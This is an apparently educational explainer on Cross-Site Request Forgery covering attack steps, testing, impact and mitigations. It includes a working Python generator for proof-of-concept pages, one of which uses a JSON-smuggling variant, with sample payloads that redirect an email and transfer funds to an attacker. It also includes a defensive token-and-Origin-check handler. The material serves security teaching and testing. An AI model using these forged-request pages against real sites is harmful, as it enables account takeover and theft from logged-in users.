CSRF

Uploaded by kidproxy

What is CSRF?

CSRF stands for Cross-Site Request Forgery. It is a web security vulnerability in which an
attacker causes a user's browser to send an unwanted request to a web application in which
the user is authenticated. Because the browser attaches the user's cookies to the request
automatically, the application cannot tell the forged request from one the user made on
purpose, and an action is performed on the user's behalf without their knowledge or consent.
The attacker does not get to see the response (the browser's same-origin policy prevents
that); CSRF is about triggering a side effect, not reading data.

Here's a basic scenario to illustrate how CSRF works:

1. The victim logs into a web application and receives a session cookie that authenticates
them.

2. While still authenticated, the victim visits a malicious website controlled by the attacker.

3. The malicious website contains code that automatically sends a request (e.g., changing
email/password, making a purchase, etc.) to the targeted web application on behalf of
the authenticated victim.

4. The victim's browser attaches the victim's session cookie to the request, because cookies
are sent according to the request's destination, not the page that initiated it (subject to
the cookie's SameSite attribute). The request therefore looks legitimate to the targeted web
application.

5. The web application, seeing a valid session cookie, processes the request as if it came
from the legitimate user, leading to unintended actions being taken on the user's
behalf.
To mitigate CSRF attacks, web developers implement anti-CSRF tokens: unpredictable values tied
to the user's session that must accompany every state-changing request and are verified on the
server. An attacker's page cannot read the token from the target site, so it cannot include it
in the forged request. Tokens are usually combined with the SameSite cookie attribute and a
check of the Origin header; both are covered under mitigations below.
How does CSRF attack work?

A Cross-Site Request Forgery (CSRF) attack tricks a victim's browser into making an
unintended request to a web application where the victim is authenticated. It works when
three conditions hold (PortSwigger's description, listed in the References): the application
has an action worth forging; it relies solely on cookies, or on other credentials the browser
attaches automatically such as HTTP Basic authentication, to identify the user; and the
request contains no parameter the attacker cannot guess, such as an anti-CSRF token. Here is
a step-by-step explanation of how the attack proceeds:

1. User Authentication:

   - The victim logs into a web application, such as an online banking site, and
     obtains a session cookie that authenticates them.

2. Attacker Preparation:

   - The attacker creates a malicious website or compromises a legitimate one (any
     page on which the attacker controls the HTML will do). This website contains the
     attack code: JavaScript, a hidden auto-submitting form, or an image tag.

3. Malicious Payload:

   - The payload is designed to perform a specific action on the target web
     application, such as changing the victim's password or email address, making a
     purchase, or initiating a fund transfer. It is nothing more than a request to the
     target application carrying the parameters the action expects, which the browser
     sends when the page loads.

4. Tricking the Victim:

   - The attacker entices the victim to visit the malicious website, through phishing
     emails, social engineering, or other means.

5. Unintended Request:

   - When the victim visits the malicious website, the payload executes automatically
     and sends the request to the target web application, exploiting the fact that the
     victim is already authenticated there.

6. Use of Victim's Authentication:

   - The victim's browser attaches the authentication credentials for the target
     application (usually the session cookie), because cookies are sent based on the
     request's destination, not on the page that initiated it, unless the cookie's
     SameSite attribute says otherwise.

7. Web Application Processing:

   - The target web application receives the request with valid credentials and, having
     no way to distinguish it from a request the user made deliberately, processes it as
     a legitimate action.

8. Unauthorized Action:

   - The web application performs the unintended action, such as changing the victim's
     password, initiating a financial transaction, or altering the victim's account
     settings. The attacker never sees the response, but the side effect has already
     happened.
How do you test for CSRF vulnerability?

Testing for CSRF (Cross-Site Request Forgery) vulnerabilities involves simulating scenarios
where an attacker might attempt to forge unauthorized requests on behalf of a user. Here are
some common methods and techniques for testing CSRF vulnerabilities:

1. Manual Testing:

   - Inspect the web application for forms and actions that perform sensitive,
     state-changing operations (changing passwords or email addresses, making
     transactions, and so on). Note how each one is protected: is there a token in the
     form or a custom request header, and what SameSite attribute does the session
     cookie carry?

   - Replay the captured request with tools like cURL, Postman, or the browser's
     developer tools, keeping the session cookie but removing or altering the
     protection, and observe whether the application still performs the action.

2. Burp Suite or Similar Proxy Tools:

   - Use a proxy such as Burp Suite to intercept and modify requests between the
     browser and the web application.

   - Manipulate form parameters, including any anti-CSRF token, and observe the
     application's response. Burp's "Generate CSRF PoC" engagement tool produces the
     auto-submitting HTML for a captured request.

3. Automated Scanning Tools:

   - Use security scanners that include CSRF checks, such as OWASP ZAP, Nessus, or
     Acunetix. Scanners mainly flag forms that lack a token; they cannot judge whether
     an action matters or whether the token is actually verified, so confirm findings
     manually.

4. CSRF PoC (Proof of Concept) Exploits:

   - Develop proof-of-concept pages to demonstrate the vulnerability: HTML or
     JavaScript that, when loaded from another origin in a logged-in victim's browser,
     sends the unauthorized request to the target application. Opening the page in a
     browser that holds a valid session and seeing the action take effect is the
     definitive test.

5. Check Anti-CSRF Token Implementation:

   - If the application uses anti-CSRF tokens, test whether they are verified
     correctly. Submit the request with the token removed, with an empty token, with a
     token taken from a different session (or from a logged-out one), with the request
     method changed from POST to GET, and with an expired token, and check that the
     application rejects each variant. Also confirm that the token is tied to the user's
     session rather than being any value the server once issued.
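The script below is an added example (not code from the original page or from any of the referenced sources) that builds the proof-of-concept page described in item 4 above and in the attack walkthrough of the previous section. It turns a captured request into the HTML an attacker's site would host: a hidden auto-submitting form for POST, an image tag for GET. The target URLs and parameter names (`bank.example`, `email`, `to`, `amount`) are made up. It goes one step beyond the page's text with `build_json_poc`, which uses the `enctype="text/plain"` form encoding to deliver a JSON body to endpoints that do not check the Content-Type header.

```python
"""Build CSRF proof-of-concept pages from a request captured in a proxy.

Added example; the target URLs, parameter names and values are constructed.
"""
import html
import json
from urllib.parse import urlencode


def _attr(value):
    """Escape a string for use inside a double-quoted HTML attribute."""
    return html.escape(str(value), quote=True)


def build_poc(action, method="POST", params=None, auto_submit=True):
    """Return an HTML page that replays `params` to `action` from a foreign origin.

    POST: a hidden form submitted by script as soon as the page loads, so no click
          is needed; sent as application/x-www-form-urlencoded with cookies attached
          (subject to SameSite).
    GET:  an <img> whose src carries the parameters; the browser fetches it silently
          with cookies, exactly like a form submission.
    Values are escaped so a captured value containing '"' or '<' cannot break the PoC.
    """
    params = dict(params or {})
    method = method.upper()
    if method == "GET":
        sep = "&" if "?" in action else "?"
        url = action + sep + urlencode(params)
        return f'<html><body><img src="{_attr(url)}" alt=""></body></html>\n'
    if method != "POST":
        raise ValueError("a plain HTML form can only send GET or POST; other methods "
                         "need a cross-origin fetch() that CORS blocks by default")
    fields = "".join(
        f'    <input type="hidden" name="{_attr(k)}" value="{_attr(v)}">\n'
        for k, v in params.items())
    button = "" if auto_submit else '    <input type="submit" value="Click to continue">\n'
    script = "  <script>document.forms[0].submit();</script>\n" if auto_submit else ""
    return ("<html><body>\n"
            f'  <form action="{_attr(action)}" method="POST">\n'
            f"{fields}{button}"
            "  </form>\n"
            f"{script}"
            "</body></html>\n")


def json_smuggle_parts(obj, pad_key="_csrf_pad"):
    """Split a JSON object into the (name, value) of one text/plain form field.

    The browser encodes a text/plain form as `name=value\\r\\n` with no escaping, so
    the '=' it inserts lands inside a throwaway string field and the body stays valid
    JSON. Works only against endpoints that parse JSON without checking Content-Type.
    """
    if pad_key in obj:
        raise ValueError("pad_key collides with a real field")
    text = json.dumps({**obj, pad_key: ""})   # ends with:  "_csrf_pad": ""}
    return text[:-2], '"}'                     # name keeps the opening quote of ""


def build_json_poc(action, obj):
    """Auto-submitting text/plain form that delivers `obj` as a JSON body."""
    name, value = json_smuggle_parts(obj)
    return ("<html><body>\n"
            f'  <form action="{_attr(action)}" method="POST" enctype="text/plain">\n'
            f'    <input type="hidden" name="{_attr(name)}" value="{_attr(value)}">\n'
            "  </form>\n"
            "  <script>document.forms[0].submit();</script>\n"
            "</body></html>\n")


def text_plain_body(name, value):
    """What the browser puts on the wire for a single text/plain form field."""
    return f"{name}={value}\r\n"


def parse_as_lenient_server_would(body):
    """A JSON endpoint that ignores Content-Type sees this object."""
    return json.loads(body)


if __name__ == "__main__":
    # Constructed example: a captured email-change request and a JSON transfer API.
    print(build_poc("https://bank.example/account/email", "POST",
                    {"email": "attacker@evil.example", "confirm": "yes"}))
    print(build_json_poc("https://bank.example/api/transfer",
                         {"to": "ATTACKER-ACCT", "amount": 1000}))
```

Host the generated page on any origin the victim can be lured to, log in to the target in the same browser, open the page, and check whether the action took effect; a rejected request at that point means a protection (token, SameSite, Origin check) is doing its job, and the variants from item 5 tell you which one.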
What is the impact and mitigations?

Impact of CSRF Vulnerabilities:

1. Unauthorized Actions:

   - The primary impact is that an attacker can perform unauthorized actions on behalf
     of a user without their knowledge or consent: changes to account settings,
     password or email changes, financial transactions, or other sensitive operations.

2. Data Integrity and Confidentiality:

   - CSRF directly affects integrity: the attacker can change data but cannot read the
     application's responses, because the browser's same-origin policy blocks that.
     Confidentiality is affected indirectly, for example when the forged request changes
     the account's email address so that a password reset is delivered to the attacker.

3. Session Impersonation:

   - The attacker acts as the user without ever learning the user's password or session
     cookie. If the victim holds administrative privileges, the forged request may create
     accounts or change settings for the whole application.

4. Trust Erosion:

   - CSRF attacks erode user trust in a web application, because actions are performed
     on users' behalf without their explicit consent and they may never learn why.

Mitigations for CSRF Vulnerabilities:


1. Use Anti-CSRF Tokens:

   - Generate an unpredictable token (a synchronizer token) that is tied to the user's
     session, embed it in every form or send it in a request header, and verify it on
     the server for every state-changing request. Compare tokens in constant time and
     reject the request if the token is missing or does not match. A token that lives
     only in a cookie is not enough: the attacker's page cannot read it, but it does not
     need to, because the browser sends the cookie automatically.

2. SameSite Cookie Attribute:

   - Set the SameSite attribute on the session cookie to control whether it is sent
     with cross-site requests. "Strict" never sends it cross-site; "Lax" (what
     Chromium-based browsers assume when the attribute is absent) still sends it on
     top-level GET navigations, so an action that changes state on GET remains
     forgeable. SameSite is a useful second layer, not a replacement for tokens, and it
     does not help against a request sent from a sibling subdomain of the same site.

3. Custom Headers:

   - Require a custom header, such as "X-Requested-With" or "X-CSRF-Token", on
     state-changing requests and reject requests without it. This works because a plain
     HTML form cannot set custom headers, and a cross-origin fetch() or XMLHttpRequest
     that sets one triggers a CORS preflight the server can refuse. The defence therefore
     stands or falls with the CORS configuration: an Access-Control-Allow-Origin that
     reflects any origin, combined with Access-Control-Allow-Headers, undoes it.

4. Check Origin and Referer Headers:

   - Verify that the Origin header (which browsers add to cross-origin POST requests)
     matches your own origin, falling back to the Referer header when Origin is absent.
     An attacker's page cannot set or spoof these headers in the browser; the weakness is
     that they may be missing (Referrer-Policy, privacy extensions, some proxies), so
     decide deliberately whether to fail closed when both are absent.

5. Same-Origin Policy and CORS:

   - The Same-Origin Policy is enforced by the browser, not something an application
     switches on, and it does not prevent CSRF: it stops the attacker's page from reading
     the response, but the request is still sent with cookies. What the application does
     control is how far it relaxes the policy through CORS; a permissive configuration
     that allows credentials from arbitrary origins turns CSRF into a full read-and-write
     compromise.

6. Require Reauthentication for Sensitive Actions:

   - For particularly sensitive actions (changing the password or email address, adding
     a payee, transferring funds), require the user to re-enter their password or a
     second factor before the action proceeds. A forged request cannot supply that.

7. Educate Users:

   - Educate users about the risks of clicking suspicious links or visiting untrusted
     websites. Awareness helps, but it is the weakest control here: a CSRF payload can
     sit on any page the victim visits, and the victim sees nothing happen.

8. Security Headers:

   - Implement security headers such as Content Security Policy (CSP). CSP on your own
     site does not stop a CSRF request launched from the attacker's site, but it limits
     XSS, and an XSS flaw lets the attacker read the anti-CSRF token and bypass every
     CSRF defence.

9. Regular Security Audits and Testing:

   - Conduct regular security audits and testing, including penetration testing and
     code reviews, to find state-changing endpoints that lack protection. Framework-level
     CSRF middleware applied to every route is easier to audit than per-endpoint checks.

10. Use HTTPS:

   - Serve the application over HTTPS and mark cookies Secure. HTTPS does not prevent
     CSRF by itself, because the forged request is sent over HTTPS with the real cookie.
     It does stop a network attacker from stripping the Origin and Referer headers or
     injecting the payload into plain-HTTP pages the user visits.
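The following handler is an added example (not the page's own code and not taken from any framework) that combines mitigations 1 through 4 above in one place: a session-bound synchronizer token, a SameSite cookie, an Origin check with Referer fallback, and acceptance of the token from either a form field or a custom header. It is framework-free so it runs offline; the site origin `https://bank.example`, the in-memory `SESSIONS` store and the single transfer action are assumptions made for illustration.

```python
"""Server-side CSRF defences in a framework-free request handler.

Added example; SITE_ORIGINS, SESSIONS and the transfer action are constructed.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGINS = {"https://bank.example"}            # assumed origin of the application
SERVER_KEY = secrets.token_bytes(32)               # binds tokens to sessions; keep secret
SESSIONS = {}                                      # session id -> {"user": ...}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def new_session(user):
    """Create a session; return (session id, Set-Cookie header value)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user}
    # SameSite=Lax: not sent on cross-site POSTs or subresource loads (mitigation 2).
    # Secure/HttpOnly do not stop CSRF but keep the cookie off the wire and away from scripts.
    return sid, f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def csrf_token(sid):
    """Synchronizer token (mitigation 1): HMAC of the session id under the server key.

    Recomputed per request instead of stored, and useless for any other session.
    Embed it in forms as a hidden field, or hand it to scripts for an X-CSRF-Token header.
    """
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers):
    """Origin check with Referer fallback (mitigation 4); fails closed if both are absent.

    Browsers add Origin to cross-origin form and fetch() POSTs, and an attacker's page
    cannot alter it. Failing closed on a missing header is a deliberate choice that can
    break clients behind privacy proxies, so log those rejections.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in SITE_ORIGINS     # "null" (sandboxed iframes, redirects) is rejected too


def handle(method, headers, cookies, form):
    """Process a /transfer request. Returns (status, message)."""
    sid = cookies.get("session")
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    if method not in STATE_CHANGING:
        # Reads need no CSRF check, and state must never change on GET: SameSite=Lax
        # still sends the cookie on top-level GET navigations.
        return 200, "transfer form"
    if not origin_allowed(headers):
        return 403, "cross-site request rejected"
    # Token from a hidden form field, or from a custom header (mitigation 3) for JS clients.
    supplied = form.get("csrf_token") or headers.get("X-CSRF-Token") or ""
    if not supplied.isascii() or not hmac.compare_digest(supplied, csrf_token(sid)):
        return 403, "missing or invalid CSRF token"     # constant-time comparison
    return 200, f"{session['user']} transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid, cookie = new_session("alice")
    print(cookie)
    own = {"Origin": "https://bank.example"}
    print(handle("POST", own, {"session": sid},
                 {"to": "bob", "amount": "10", "csrf_token": csrf_token(sid)}))
    print(handle("POST", {"Origin": "https://evil.example"}, {"session": sid},
                 {"to": "attacker", "amount": "1000"}))
```

The checks are ordered so that the cheapest and most robust one (Origin) runs first and the token check is the final gate; each layer catches a case the others miss, which is why the page's mitigations are meant to be stacked rather than chosen between.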

References:

https://portswigger.net/web-security/csrf

https://www.cloudflare.com/learning/security/threats/cross-site-request-forgery/

https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/

https://owasp.org/www-community/attacks/csrf

https://brightsec.com/blog/cross-site-request-forgery-csrf/
